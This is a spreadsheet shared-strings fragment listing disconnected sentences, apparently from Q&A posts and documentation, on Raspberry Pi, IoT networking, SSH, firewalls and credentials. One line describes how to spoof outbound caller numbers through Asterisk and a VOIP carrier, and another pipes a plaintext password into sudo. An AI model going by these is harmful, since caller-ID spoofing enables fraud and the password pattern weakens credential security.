Date/Time "To know when the data was messured"
Air humidity
Temperature
I am not sure if I need to send account/password information, since it should not matter as long as the account "owns" the station.</t>
  </si>
  <si>
    <t>I want to be able to mount my disk based on the local network (Synology) to my Raspberry Pi but I got the following error:
probobly because the 'nfs-server' was not installed:
so tried to installed but I got the following problem probably because some dependency between KURA and firewall, I stopped KURA service but still same problem:
pi@raspberrypi /home $ sudo apt-get install  nfs-server -y
Reading package lists...</t>
  </si>
  <si>
    <t>Credential Security Support Provider
Descriptive Security options in Group Policy/Local Security Policy user interface
An updated version of the Microsoft Enhanced Cryptographic Provider Module (RSAENH) that is FIPS 140-2 certified (SHA-256, SHA-384 and SHA-512 algorithms)
Installing without requiring a product key during setup for retail and OEM versions</t>
  </si>
  <si>
    <t>cronjob does not execute a script that works fine standalone
Some implementations of cron, such as that in the popular 4th BSD edition written by Paul Vixie and included in many Linux distributions, add a sixth field to the format: an account username that the specified job will be run by (subject to user existence and permissions).</t>
  </si>
  <si>
    <t>ASP.NET, in conjunction with Microsoft Internet Information Services (IIS), can authenticate user credentials such as names and passwords using any of the following authentication methods:
Windows: Basic, digest, or Integrated Windows Authentication (NTLM or Kerberos).</t>
  </si>
  <si>
    <t>Backups are also distributed in a similar fashion to other nodes, based on configuration, thereby protecting against single node failure.</t>
  </si>
  <si>
    <t>Some network administrators have banned Skype on corporate, government, home, and education networks, citing reasons such as inappropriate usage of resources, excessive bandwidth usage, and security concerns.</t>
  </si>
  <si>
    <t>(In embedded system environment to be specific Arduino)
So far I have made a safe and unsafe version for all functions, is that a good idea?</t>
  </si>
  <si>
    <t>It is thus safer to leave the firewall the same and instead make the device subscribe to an external webserver, which acts as a mailbox for incoming messages.</t>
  </si>
  <si>
    <t>I am currently using a Raspberry Pi3 running Windows Core IoT, and I can successfully log in using PuTTY as an SSH client, but it asks for a password.</t>
  </si>
  <si>
    <t>I did the exact same steps, which are:-
1) Go to ~/.node-red/settings.js
2) Uncomment adminAuth
3) Install node-red-admin - sudo npm install -g node-red-admin
4) Generate hash password using, node-red-admin hash-pw
5) Paste the hashed password to adminAuth password field.</t>
  </si>
  <si>
    <t>As far as I can see, one of the best sources for figuring out how to read and write to the  dev node is this link:
http://todbot.com/blog/2006/12/06/arduino-serial-c-code-to-talk-to-arduino/
However, his serialport_read_until smells suspicious.</t>
  </si>
  <si>
    <t>I'm trying to figure out the best way to intercept some keyboard commands without installing any software on a machine.</t>
  </si>
  <si>
    <t>For that purpose in most configurations, you can write to 
Code doing this would need to run as root (as something launched from rc.local would) or the permission of the device node would need to be changed.</t>
  </si>
  <si>
    <t>I am trying to send file from windows local system to QEMU raspberry pi emulator.But every time I am getting "access denied".I have downloded pscp.exe.</t>
  </si>
  <si>
    <t>Idea is to find, connect and send wireless router password to a new device for easy installation.</t>
  </si>
  <si>
    <t>In the end I simply did:
(This sets modifies the executable (called "action") to always run with root privileges.)</t>
  </si>
  <si>
    <t>You can use Windows 10 IoT Core Dashboard to detect all the devices connected in the network which running with Windows IoT Core.In "My Devices" tab, it lists the name,type,ip, and OS version of all detected devices.</t>
  </si>
  <si>
    <t>The simplest solution is to create a file containing your account credentials (A JSON blob) and set the environment variable GOOGLE_APPLICATION_CREDENTIALS to contain the path to that file.</t>
  </si>
  <si>
    <t>NetFlow does not require deep packet inspection; by default it summarizes only IP header and protocol header information.</t>
  </si>
  <si>
    <t>The Spam module includes several spam filter modules, all of which work together to determine if a given piece of content is spam.</t>
  </si>
  <si>
    <t>It is designed to provide a stable, secure, and high performance execution environment for applications running on Amazon EC2.</t>
  </si>
  <si>
    <t>Virtual Private Database is an Oracle security feature which restricts the data which users can see and/or change.</t>
  </si>
  <si>
    <t>Is there really no chance to let my iPhone communicate with an other bluetooth enabled device without jailbreaking (which as far as I know would be required if i'd use btstack: http://code.google.com/p/btstack/)?</t>
  </si>
  <si>
    <t>With this bit and ownership of your binary set to root you can allow a regular user to run your file without referring to sudo.</t>
  </si>
  <si>
    <t>After hours of digging I found that you cannot make arbitrary topic names with the default permissions.</t>
  </si>
  <si>
    <t>When users create a restricted profile, they can enable restrictions such as which apps are available to the profile.</t>
  </si>
  <si>
    <t>The Amazon Linux AMI limits remote access capabilities by using SSH key pairs and by disabling remote root login.</t>
  </si>
  <si>
    <t>The Windows Desktop, Win32, uses the Windows 10 version of the Win32 API which contains functionality that is unavailable in the WinRT in order provide the security of a protected environment for WinRT.</t>
  </si>
  <si>
    <t>I can't ping the shield IP address that shows in the router administrator page.</t>
  </si>
  <si>
    <t>In order to provide a friendly UI I would like my app UI to startup without showing any Unix screens, such as splash screen, login and BIOS.</t>
  </si>
  <si>
    <t>I want to be able to set a digital timer that would lock when set then enlock when the time goes out.</t>
  </si>
  <si>
    <t>There is however a significant amount of packet loss or corruption which I would like to eliminate.</t>
  </si>
  <si>
    <t>I used reset and reboot button, unplugged power supply but not much help.</t>
  </si>
  <si>
    <t>I don't expect the end user to know how to access the router and configure port forwarding.</t>
  </si>
  <si>
    <t>Depending on your configuration, as an administrator you might also be able to use the button below to trust this domain."</t>
  </si>
  <si>
    <t>If I need to connect to that machine from another computer (other than the raspberry pi 3) I can do so using host hopping with a ProxyCommand in my ssh config on the given machine.</t>
  </si>
  <si>
    <t>Same thing happens running from the touchscreen, running through SSH, and running through tightvncserver remote desktop.</t>
  </si>
  <si>
    <t>I've win10 on my home pc and i understand how to set up the windows insider procedure.</t>
  </si>
  <si>
    <t>login scripts, LXDE-pi autostart, cron task @reboot, init.d, and I cannot get my script running with a terminal window running in the foreground so that I can interact with it.</t>
  </si>
  <si>
    <t>I would expect to be able to provide credentials that are set from within the web dashboard of Windows 10 IoT.</t>
  </si>
  <si>
    <t>However, when setting permissions to 770 I get access denied
EDIT2:
When using var_dump(posix_geteuid()); instead of get_current_user();, i get UID 33, which matches user www-data.</t>
  </si>
  <si>
    <t>I am told that by default the RPI is not behind any kind of firewall so there for I strongly suspect the router.</t>
  </si>
  <si>
    <t># Safe to enable by default because it requires the equivalent option set
# on the server to actually work.</t>
  </si>
  <si>
    <t>If you had a fleet of remote pi's (without fixed IPs you could conveniently SSH into) how would you deploy different code to them or sync their filesystems with a remote repository?</t>
  </si>
  <si>
    <t>ALso, I suspect NPAV antivirus which I installed in my laptop recently maybe causing the error, since the scan shows some arduino files as threats...</t>
  </si>
  <si>
    <t>I mean that all my website are "offline", I can't connect via via SSH locally and the only thing I need to do is to "force" reboot it by remove the wire.</t>
  </si>
  <si>
    <t>I am using WSO2(3.2.0) IOT server for the iPhone MDM and installed it as per the direction in the website 
I generated the MDM APNS certificate
 and added it to ios configurations at the server.</t>
  </si>
  <si>
    <t>To authorize and use ADLS, I need to install extra dependencies and manually manage its credentials.</t>
  </si>
  <si>
    <t>Since edgeHub is not fully initialized and TLS authentication and MQTT paths are not set, the first few messages of my-module are lost.</t>
  </si>
  <si>
    <t>I am able to configure the esp8266 using the tapzu wifi manager, i would also like to send the mqtt server id and password from the wifi configure page so that the esp can connect to the mqtt server.</t>
  </si>
  <si>
    <t>I installed python-openzwave on an Ubuntu VM where I can lock/unlock/set codes through a zwave controller connected to the computer.</t>
  </si>
  <si>
    <t>It is still frozen and I don't want to risk losing any files, please find a safe way to complete the installation.</t>
  </si>
  <si>
    <t>Regarding port forwarding of the router and sshd_config port setting.</t>
  </si>
  <si>
    <t>So I purged the java installation and installed the java certificates using the following commands:
Now I am getting the following errors when run the install script:
Am I just having badluck here?</t>
  </si>
  <si>
    <t>When the network connection go down, by restarting RPI or the rooter, the RPI connects to the AP of GoPro with booth wlan and there is no way to access the RPI remotely again, someone must do it manual, and is not easily accessible.</t>
  </si>
  <si>
    <t>at System.Net.Security.SslState.StartSendAuthResetSignal
Note:
I am running my code on Windows Embedded Standard.</t>
  </si>
  <si>
    <t>The RPI has no firewall setup, but has a hardware firewall to the web only allowing ports 25,993,465.</t>
  </si>
  <si>
    <t>Then, in what scenarios do we prefer to use configuring device twins over sending telemetry.</t>
  </si>
  <si>
    <t>at System.IO.WinRTIOExtensions", from this error is more than clear that we are talking about permissions but i already tryed changing the ACL for that folder: get-acl "c:\temp" will return "temp BUILTIN\Administrators Everyone Allow  FullControl...", so it is supposed to have all the needed permissions.</t>
  </si>
  <si>
    <t>I am trying to set a custom ssl certificate on a SIM800H module on my arduino (Adafruit FONA), in order to use it on mqtt with a secure TLS connection.</t>
  </si>
  <si>
    <t>What I need to do is to generate signed certificates both for registry and for devices in order to ensure that fraudulent devices are not registered.</t>
  </si>
  <si>
    <t>Mosquitto is set up like here: 
http://dagrende.blogspot.com/2017/02/find-mqtt-broker-without-hard-coded-ip.html
The LUA mdns module doesn't provide discovering, am I right?</t>
  </si>
  <si>
    <t>This is all fine and dandy and works great, but I noticed that it doesn't produce any key_mgmt fields, unlike if you were to manually log into a network via the desktop GUI.</t>
  </si>
  <si>
    <t>The firewall here at my workplace is probably blocking MQTT traffic which is why the python iotc solution is not working.</t>
  </si>
  <si>
    <t>I suggest that in the near future all web server will require genuine ssl certifcation.</t>
  </si>
  <si>
    <t>It works ok via internet with the rpi on ethernet or wifi static ip on my home router (firewall off) and raw access with putty and remserial on /dev/ttyACM0.</t>
  </si>
  <si>
    <t>These physical addresses can be mapped into kernel virtual address space.</t>
  </si>
  <si>
    <t>Most routers only trigger port forwarding if the connection is coming from the public interface.</t>
  </si>
  <si>
    <t>Kindly ensure pairing the device explicitly from your Android phones settings.</t>
  </si>
  <si>
    <t>A simple configuration example:  
The server in port 80 will redirect all traffic to your https server.</t>
  </si>
  <si>
    <t>The Pro Git book covers how to do this quite thoroughly in Chapter 4.4:
Lets walk through setting up SSH access on the server side.</t>
  </si>
  <si>
    <t>Activate cron jobs in Raspbmc
Per default running cron jobs is deactivated in Raspbmc and there are two ways to activate them.</t>
  </si>
  <si>
    <t>To avoid risks with sudo being hijacked, you could do a proxy method of doing the follwing:
Have a superuser cronjob set that runs every minute.</t>
  </si>
  <si>
    <t>It states:
Following is a example to enable configuration and disable configuration by using debug.</t>
  </si>
  <si>
    <t>authorized_keys is the usual name of a list of public keys, for other machines, authorized to log in on that machine.</t>
  </si>
  <si>
    <t>In case you are wondering how to get location information on a Raspberry Pi without GPS, if you have a WiFi dongle and internet connectivity, then the Google Geolocation API works great.</t>
  </si>
  <si>
    <t>You can checking that your connection is OK, try to ping the PC from the Ardunio or  a firewall blocking the messages?</t>
  </si>
  <si>
    <t>Or you can see this by setting the high bit of ascii "1":
&gt;&gt;&gt; chr(ord("1") | 0b10000000)
''
Now, "1", "2" and "4" have three bits set (odd parity), and are corrupted.</t>
  </si>
  <si>
    <t>Some app such as iTerm will set the environment variables for you when you login to another computer, sometime it will cause problems.</t>
  </si>
  <si>
    <t>I've checked the adafruit shield and it doesn't do card emulation because it requires an external Secure Element from NXP.</t>
  </si>
  <si>
    <t>On your raspberry pi install xRDP
Then log in from your Windows and open Remote Desktop Connection/Viewer and proceed.</t>
  </si>
  <si>
    <t>The firmware would handle that write request and then update the device name and advertising packet.</t>
  </si>
  <si>
    <t>Example : Edit MySQL configuration
By default, MySQL is not configured to accept remote connections.</t>
  </si>
  <si>
    <t>If you need to provide credentials for accessing a remote (SMB) share you need to map it to a drive letter before you can use it with robocopy.</t>
  </si>
  <si>
    <t>If the proxy server was configured for working on Socks protocol, such as Socks4/Socks5, the script within any mode will works fine, because the Socks protocol just transmit datagram, not check the protocol type.</t>
  </si>
  <si>
    <t>If you want to spoof phone numbers yourself, you need to set up a PBX solution like Asterisk, and you need service with a VOIP carrier that allows you to self assign the outbound CNUM data.</t>
  </si>
  <si>
    <t>Creating an empty file with name ssh in the FAT32 boot partition should be
also possible using a laptop running Windows.</t>
  </si>
  <si>
    <t>Assuming that you are running linux on your raspberry pi, you might be able to get the tiniest bit of security using chmod 100 on it, but I do not know enough to confirm or deny this for sure.</t>
  </si>
  <si>
    <t>Let's be clear: if you are behind a router, it needs to be configured to redirect port to your computer.</t>
  </si>
  <si>
    <t>If entered remotely what is the platform of the machine you are entering the text on?</t>
  </si>
  <si>
    <t>QoS equal to 1: the latest configuration update is retried until the device acknowledges it with a PUBACK.</t>
  </si>
  <si>
    <t>Another way: copy libcurl.so and libcrypto.so from raspberrypi onto your computer, specify directory where they reside with -L and try to compile, it should work.</t>
  </si>
  <si>
    <t>(If you have lost your device's token, the only way to restore connectivity is to re-register the device to get a new token).</t>
  </si>
  <si>
    <t>And enter an arbitrary name that will serve as key for your connection string configuration.</t>
  </si>
  <si>
    <t>Your safest course of action is to wipe the SD card and start with a clean system.</t>
  </si>
  <si>
    <t>I am able to access the bluetooth LE remote now on my Raspberry Pi Zero thanks to @ukBaz who pointed out how to access the HID over GATT (short HoG in Linux:
Pair the remote using 
This has to happen only once.</t>
  </si>
  <si>
    <t>I ran  in a ssh window after verifying the interface settings in raspi-config.</t>
  </si>
  <si>
    <t>Each instance will require a bit of code inspection and fiddling with directives to get patched up.</t>
  </si>
  <si>
    <t>The Android system requires that all installed applications be digitally signed with a certificate whose private key is held by the application's developer.</t>
  </si>
  <si>
    <t>Google AppEngine service which provides information useful for forcing a user to log in or out, and retrieving information about the user who is currently logged-in.</t>
  </si>
  <si>
    <t>An exception thrown when a remote endpoint could not be found or reached.</t>
  </si>
  <si>
    <t>The Secure Remote Password protocol (SRP) is a password-authenticated key agreement protocol in order to establish an encrypted channel based on a password.</t>
  </si>
  <si>
    <t>The exception that is thrown when the operating system denies access because of an I/O error or a specific type of security error.</t>
  </si>
  <si>
    <t>Buffer overruns are often exploited by malicious users to perform actions on the target computer.</t>
  </si>
  <si>
    <t>An application that allows administrators to configure the packet processing tables provided by the Linux kernel firewall.</t>
  </si>
  <si>
    <t>It is commonly used in embedded devices such as set top boxes and networking gear.</t>
  </si>
  <si>
    <t>Action: The options to resolve this Oracle error are:
The user can have the Oracle DBA grant him the appropriate privileges that he is missing.</t>
  </si>
  <si>
    <t>If from the same document, an ACCESSKEY is re-used, the next ACCESSKEY enabled link in the document (in the order they appear) that uses the same setting will be activated.</t>
  </si>
  <si>
    <t>Android requires that all apps be digitally signed with a certificate before they can be installed.</t>
  </si>
  <si>
    <t>The playground is pre-configured to use with Google's OAuth 2.0 endpoints and APIs so that you can quickly and easily play around with these.</t>
  </si>
  <si>
    <t>In order to avoid blocking, you can register your interest in particular keys and to become notified when their values become available.</t>
  </si>
  <si>
    <t>In ssh the -X flag treats the remote client as untrusted and runs X11 forwarding with SECURITY extensions enabled.</t>
  </si>
  <si>
    <t>), and full session management (authentication, fine-grained authorization, etc.)</t>
  </si>
  <si>
    <t>On a file-by-file basis, password recovery is utilized to gain access to digital evidence for which a judge has allowed access but the particular file's access is restricted.</t>
  </si>
  <si>
    <t>Support for sensing iBeacons requires a Bluetooth 4.0 device that supports Bluetooth Low Energy (BLE) mode.</t>
  </si>
  <si>
    <t>The interceptors in the stack are invoked in the order as followed in the configuration for the interceptor stack.</t>
  </si>
  <si>
    <t>AROS Intel based AmigaOS clone keeps available to its users the freeware utility called Amistart, and leave them free to install it.</t>
  </si>
  <si>
    <t>If the server is configured to use LTPA, the server first checks for a valid LTPA token for the SSO domain the server has been configured for.</t>
  </si>
  <si>
    <t>The ConnMan project provides a daemon for managing internet connections within embedded devices running the Linux operating system.</t>
  </si>
  <si>
    <t>This module can be used to selectively allow or deny
access to arbitrary parts of an application (typically directories)
for specific users or roles.</t>
  </si>
  <si>
    <t>Flexible
Zeek is not restricted to any particular detection approach and does not rely on traditional signatures.</t>
  </si>
  <si>
    <t>Changes:
In v1.0, there were API endpoints that didn't require an access token to call.</t>
  </si>
  <si>
    <t>UDP encapsulation, labeled PGM/UDP, requires no special privileges and is supported everywhere except by PGM Routers.</t>
  </si>
  <si>
    <t>Facebook Login allows a person to grant only a subset of permissions that you ask for to your app, except for public profile, which is always required.</t>
  </si>
  <si>
    <t>As an example, let's say that I need to download some questionable file into an isolated secure sandbox for close inspection.</t>
  </si>
  <si>
    <t>Virtual addresses are used by the accessing process, while physical addresses are used by the hardware.</t>
  </si>
  <si>
    <t>Shorewall can be used on a dedicated firewall system, a multi-function gateway/router/server or on a standalone GNU/Linux system.</t>
  </si>
  <si>
    <t>Reasons why you may want to use spawn-fcgi instead of something else:
Privilege separation without needing a suid-binary or running a server as root.</t>
  </si>
  <si>
    <t>It is commonly used to bundle a private key with its X.509 certificate, or to bundle all the members of a chain of trust.</t>
  </si>
  <si>
    <t>Unlike encrypted data bags, it does not require the use of one shared key by all users and pieces of infrastructure.</t>
  </si>
  <si>
    <t>The SFTP protocol requires a secure channel, such as SSH, as well as visibility to a clients identity throughout the SFTP session.</t>
  </si>
  <si>
    <t>RADIUS,   defined in RFCs 2865 and 2866, allows clients to perform    authentication and accounting by means of network requests remote servers.</t>
  </si>
  <si>
    <t>It's great for Domain Driven Design and for adding safety to your internal code.</t>
  </si>
  <si>
    <t>Private modules enable you to share your code with a limited set of collaborators (users or teams).</t>
  </si>
  <si>
    <t>This facilitates secure exams especially on unmanaged computers like students' own laptops.</t>
  </si>
  <si>
    <t>With HashiCorps Vault you have a central place to manage external secret data for applications across all environments.</t>
  </si>
  <si>
    <t>firewall ports and RPC ports) as well as DTC failures around unwanted transaction promotion.</t>
  </si>
  <si>
    <t>To defend against power loss, transactions (or their effects) must be recorded in a non-volatile memory.</t>
  </si>
  <si>
    <t>Mod_evasive is an Apache Http Server module that provides evasive action in the event of an HTTP DoS or DDoS attack or brute force attack.</t>
  </si>
  <si>
    <t>Better CAPTCHA systems will provide solutions to some of these issues, such as an audio alternative, but these users are generally still left at a disadvantage.</t>
  </si>
  <si>
    <t>Regular token won't be able to have administrative permissions (such as changing system-time, or installing applications).</t>
  </si>
  <si>
    <t>In C# The  keyword denotes an unsafe context, which is required for any operation involving pointers.</t>
  </si>
  <si>
    <t>DHCP allows for computers to be configured automatically to communicate with each other over an IP network without the need for setup by a network administrator.</t>
  </si>
  <si>
    <t>It can be used to
configure the data collection itself, allowing certain
setups to be monitored without any manual configuration of
RRDtool.</t>
  </si>
  <si>
    <t>After authentication, and if the /etc/sudoers configuration file permits the user access, then the system will invoke the requested command.</t>
  </si>
  <si>
    <t>It's that simple to access a black hole of geo information that, otherwise, would require too much time to do.</t>
  </si>
  <si>
    <t>ZigBee is a wireless networking protocol built upon the 802.15.4 communication standard and is operating on channels in the 900MHz or 2.4GHz frequency range.</t>
  </si>
  <si>
    <t>100% managed, without unsafe blocks
Can be used in Silverlight
No external dependencies</t>
  </si>
  <si>
    <t>It also follows the Guice idioms of using simple, expressive configuration and tries to remain type-safe as far as possible.</t>
  </si>
  <si>
    <t>For example: when the listener has not been started on the node, if the node address has been specified incorrectly, or a firewall blocks access.</t>
  </si>
  <si>
    <t>I can be a troll, but in my experience with obtaining site "power", I have not abused said power.</t>
  </si>
  <si>
    <t>(My work machine with Simulink is a PC, but I'm not allowed to install "unauthorized software", so I did the rest on my home Mac.)</t>
  </si>
  <si>
    <t>When I use Outlook I have to configure my outgoing (SMTP) server "requires authentication" and needs to use SSL and port 465.</t>
  </si>
  <si>
    <t>I want to encrypt the traffic over HTTPS but is this possible when using Windows 10 IoT Core?</t>
  </si>
  <si>
    <t>Tried turning off IP v6, Windows Firewall, rebooting host etc, still not able to connect.</t>
  </si>
  <si>
    <t>I'm using this textbook code for the OneDrive authorization and authentication:
This part works fine when working directly on the Raspberry Pi, i.e.</t>
  </si>
  <si>
    <t>The issue just appears using the combination of chromium and embedded credentials.</t>
  </si>
  <si>
    <t>How can we prevent the foreground process from hanging without opening up the firewall?</t>
  </si>
  <si>
    <t>Is there something going on with Windows where previously connected devices aren't discoverable by web-bluetooth?</t>
  </si>
  <si>
    <t>I have tried this and my quad just sits there, props spinning just as it does after being armed, then disarms when my script finishes.</t>
  </si>
  <si>
    <t>When I ping those addresses I get 100% package lost which indicates that they are offline.</t>
  </si>
  <si>
    <t>With a shared AES key, only authentic nodes (devices with the key) can join and send data on the network.</t>
  </si>
  <si>
    <t>update ...
concerning JWT refresh tokens, see this article or have some Q &amp; A or the specification: JSON Web Token (JWT), JSON Web Token (JWT) Profile for OAuth 2.0 Client Authentication and Authorization Grants.</t>
  </si>
  <si>
    <t>The rootcause of the issue were the Windows 10 default Firewall settings.</t>
  </si>
  <si>
    <t>Some devices can not find wifi network with 40MHz bandwidth or 12 and 13 channel number.</t>
  </si>
  <si>
    <t>Windows Hello is a more personal way to sign in to your Windows 10 devices with just a look or a touch.</t>
  </si>
  <si>
    <t>It's shipped with `twisted` itself and it automatically takes care for you of logging, daemonizing, permissions and more; while still allowing you to configure all of these.</t>
  </si>
  <si>
    <t>A Power BI gateway is software that you install within an on-premises network; it facilitates access to data in that network.</t>
  </si>
  <si>
    <t>It is primarily work with Peers, which discovers the other Device using unique ID called sessionId.</t>
  </si>
  <si>
    <t>When no longer needed, ExecutorService must be explicitly shutdown like a tiny OS.</t>
  </si>
  <si>
    <t>Is it possible that UPnP network discovery/announcement messages are being lost or blocked somehow?</t>
  </si>
  <si>
    <t>At school we use badge for mark who is present, for my exam i want to upgrade that system.</t>
  </si>
  <si>
    <t>I was trying to set up an encrypted communication between node.js and NodeMCU.</t>
  </si>
  <si>
    <t>Where I think I will have the most trouble is that the Windows software requires some manner of special code to 'authenticate' the USB box.</t>
  </si>
  <si>
    <t>SSH is already set up, nodes can SSH-in without password, although I must run ssh-agent and ssh-add my keys on each node.</t>
  </si>
  <si>
    <t xml:space="preserve">
Is it possible that UPnP network discovery/announcement messages are being lost or blocked somehow?</t>
  </si>
  <si>
    <t>If you see the SYN packet reaches the server, try to shutdown the server's firewall completely and try again.</t>
  </si>
  <si>
    <t>Yes, it's suitable to trigger the dialog for password by using PointerPressed event.</t>
  </si>
  <si>
    <t>I needed the following:
However, I also needed to disable Windows Firewall since I'm running this on WSL.</t>
  </si>
  <si>
    <t>Roles represent groupings of Users for the purposes of granting permissions (e.g.</t>
  </si>
  <si>
    <t>It usually suffices to have an USB driver installed suitable for the device being debugged.</t>
  </si>
  <si>
    <t>this is the code:(the purpose of this code is to update a thingspeak channel)
user and pass are my wifi username and password.</t>
  </si>
  <si>
    <t>Standard Wi-Fi could also work, if you're able to require the presence of the supporting network.</t>
  </si>
  <si>
    <t>I wouldn't expose ESP8266, or any other IoT device for that matter, to the Internet directly.</t>
  </si>
  <si>
    <t>Yes, I would avoid revealing an 'internal' AWS hostname.</t>
  </si>
  <si>
    <t>But you still need a way to discover when credentials are stolen.</t>
  </si>
  <si>
    <t>The right subtree of a node contains only nodes with keys greater
than the node's key.</t>
  </si>
  <si>
    <t>While searching around I've found this thread: How do I set the proxy to be used by the JVM
As I understood, it is sufficient (under Raspbian) to set 
export ftp_proxy="http://username:password@host:port/"
in /etc/environment 
and write  into my code to make the program use the proxy.</t>
  </si>
  <si>
    <t>Restart the MySQL service
sudo service mysql restart
Setup MySQL permissions
Connect to your MySQL instance as root:
mysql -p -u root
Create a user:
CREATE USER '&lt;username&gt;'@'&lt;ip_address&gt;' IDENTIFIED BY '&lt;password&gt;';  
The apostrophes ( ' ) in the syntax are required
The IP address is the IP address of the device on the network you are trying to connect from
Grant permissions to the relevant databases and tables:
GRANT ALL PRIVILEGES ON &lt;database&gt;.</t>
  </si>
  <si>
    <t>This is a good resource if you are curious how to build circuits with the Raspberry Pi's GPIOs:  http://elinux.org/RPi_Tutorial_EGHS:GPIO_Protection_Circuits
It provides examples for a few different use cases and it discusses a lot of the basic electronics concepts and components used in the circuits.</t>
  </si>
  <si>
    <t>Further performance gains are achieved by serializing all data
access, avoiding many of the time- consuming functions of traditional
databases such as locking, latching, and maintaining transaction
logs.</t>
  </si>
  <si>
    <t>I have almost gotten it set up to use the integrated debugger, however, I am running into an issue where GDB says 
Here is the ouput from the debug window in VSCode
Here is the script I am using to setup gdbserver on the RPi (with the variable names excluded to protect my privacy).</t>
  </si>
  <si>
    <t>Here's an example you can take a look at
http://raspi.tv/2013/rpi-gpio-basics-3-how-to-exit-gpio-programs-cleanly-avoid-warnings-and-protect-your-pi
Good luck!</t>
  </si>
  <si>
    <t>The virtual machine may also abort if a native method goes awry by, for example, corrupting internal data structures or attempting to access nonexistent memory.</t>
  </si>
  <si>
    <t>I started to look in to ssl certificates when I stumbled upon let's encrypt, and I wanted to use it with gitlab, however being that it is running on a raspberry pi 2 and its running quite perfectly now (so I dont want to mess anything up), he would I go about installing a lets encrypt ssl certificate properly?</t>
  </si>
  <si>
    <t>For example when you connect your phone to a public WiFi hotspot/access point, you receive a message from OS that it is required to accept terms/conditions or you need to logon to be able to use the connection.</t>
  </si>
  <si>
    <t>A few ideas:
(Update) Check the JWT is valid on JWT.io
Regenerate your EC public / private key and register the device again
Note the maximum lifetime of a token is 24 hours.</t>
  </si>
  <si>
    <t>From the documentation:
The Ad Support framework provides apps with access to an identifier that can be used only for serving advertisements, as well as a flag which indicates whether a user has limited ad tracking.</t>
  </si>
  <si>
    <t>If permission is granted then an access token is made available to the OAuth library and requests for the granted information can be made successfully.</t>
  </si>
  <si>
    <t>Starting version 2.0, SEB offers an individual configuration per exam, which is protected by a strong encryption against manipulation.</t>
  </si>
  <si>
    <t>Its ease of use and plethora of advanced features makes it one of the most popular alternative Bitcoin clients, and is featured on the main Bitcoin website.</t>
  </si>
  <si>
    <t>Que is a high-performance alternative to DelayedJob or QueueClassic that improves the reliability of your application by protecting your jobs with the same ACID guarantees as the rest of your data.</t>
  </si>
  <si>
    <t>Database administrators can restrict access to individual stored procedures, giving them ability to define very granular security if needed.</t>
  </si>
  <si>
    <t>What I tried to do was:
and
system("echo pass\x22word | sudo -S hwclock --set --date \"7/20/37 12:00:00\" -f /dev/&lt;device&gt;");
both give me the error 
sh: 1: Syntax error: Unterminated quoated string
Running the program with "password" instead of "pass\"word" works without the error.</t>
  </si>
  <si>
    <t>I have already forwarded port 22 to my raspberry ip, I have given my raspberry a static ip in the router.I have also created and succesfully logged in into no-ip on my router.</t>
  </si>
  <si>
    <t>policy
UPDATE:
I attempted to give the lambda function admin access temporarily and that did not even work.</t>
  </si>
  <si>
    <t>I would like to set up some sort of server (I'm new to this sort of stuff so don't know what is required) that I can send the attempted username and password and it will return the data if the user is an admin.</t>
  </si>
  <si>
    <t>If you set the access conditions to a (not so sensible) value that permits writing using key A, you can use this NDEF library to write your NDEF message to the tag.</t>
  </si>
  <si>
    <t>DetachPolicy - detach the policy from the certificate
DetachThingPrincipal - detach the certificate from the Thing
UpdateCertificate to set to INACTIVE (or set  in #4)
DeleteCertificate
DeletePolicy
DeleteThing
Note: You can get the array of principals(cert ARNs) associated with thing using  ListThingPrincipals 
p.s.</t>
  </si>
  <si>
    <t>Each instance is configured through its init method with the keys,
  certificate chains, and trusted root CA certificates that it needs to
  perform authentication.</t>
  </si>
  <si>
    <t>They have almost always been used since computers were first connected with each other as a way of making sure that each user had the ability to know that their account on the computer or network was not going to be taken over by a peer worker who had something against them.</t>
  </si>
  <si>
    <t>I do know that the Arduino has not enough processing power to handle HTTPS encryption but I'm wondering if a solid alternative can be used here.</t>
  </si>
  <si>
    <t>I'm sure this line is not required, I am having it here for safety sake :)
I have left the comments in the below code in order for you to try and understand what I am doing.</t>
  </si>
  <si>
    <t>We've finally got TFS 2013 up and running and would like to start exposing some reports on a web browser running on a Raspberry Pi.</t>
  </si>
  <si>
    <t>Are there any tools that allow TFS information to be exposed as a web page without relying on Windows login?</t>
  </si>
  <si>
    <t>My main goal is to ensure that the file system is in a state where it won't get corrupted when the power is removed.</t>
  </si>
  <si>
    <t>But am not able to follow Digi Xbee User manual instructions to update the firmware Over The Air or via wired medium without using XCTU software.</t>
  </si>
  <si>
    <t>However, I'd like to expose these capture interfaces to multiple users and i thought it might be good to not use null authentication but have at least a little barrier for unwanted users.</t>
  </si>
  <si>
    <t>What i want to do is to remotely access my Raspberry Pi that is using a Maestro modem using my computer connected to a LAN.I have managed to configure my Pi's IP address to be static.</t>
  </si>
  <si>
    <t>My router is almost completely locked down for management, but I can enter static IPs for devices - is this necessary, if I configure the Pi to do it?</t>
  </si>
  <si>
    <t>Using Spyder to create local kernels and use them to interpret code is working perfectly fine.</t>
  </si>
  <si>
    <t>The device is connected through Ethernet, I can ping it
I've connected through Powershell, changed admin password.</t>
  </si>
  <si>
    <t>But the strange thing is, when I run SSH with PuTTY on a different laptop, the Internet connection is fine.</t>
  </si>
  <si>
    <t>What I want to accomplish:
I'm trying to establish a reliable connection between a smartphone                  running Android and the ESP8266 wifi module.</t>
  </si>
  <si>
    <t>Everything works perfectly fine in my Ubuntu but get some trust issues when I move everything to the board.</t>
  </si>
  <si>
    <t>When I run my application via the remote debugger I get:
Additional information: Unable to load DLL
  'C:\Users\Public\snap7.dll': Access is denied.</t>
  </si>
  <si>
    <t>However, after connected via Kernel Debugger and set Kd_DEFAULT_MASK
= 0xF,  cannot see any filter drivers trace messages.</t>
  </si>
  <si>
    <t>For clearance sake: every command is executed on my RasPi2; I'm connected to it through ssh from my regular desktop pc.</t>
  </si>
  <si>
    <t>I am trying to execute a Python Program (which is running on my Raspberry Pi) remotely from an Android Phone via SSH.</t>
  </si>
  <si>
    <t>I also followed instructions on setting up the Watchdog from this link: http://donalmorrissey.blogspot.com/2011/09/using-watch-dog-on-atmega1281-as-lock.html
I uploaded the same code on an Atmega328 MCU but it works fine.</t>
  </si>
  <si>
    <t>I've followed all the instruction in Noobs but i can't go on with the install procedure becouse they ask me to sign up as windows insider.</t>
  </si>
  <si>
    <t>When I send  request, ESP module should create hotspot and I can connect my computer through the access-point to update firmware.</t>
  </si>
  <si>
    <t>I want to have 2 accounts, first will be original Pi account that I want to set password on sudo/root so no one will install or change anything.</t>
  </si>
  <si>
    <t>I would like my esp8266 to retrieve the mac address of the AP it`s connected to as a client (station), following this discussion on How to get Access Point MAC adress.</t>
  </si>
  <si>
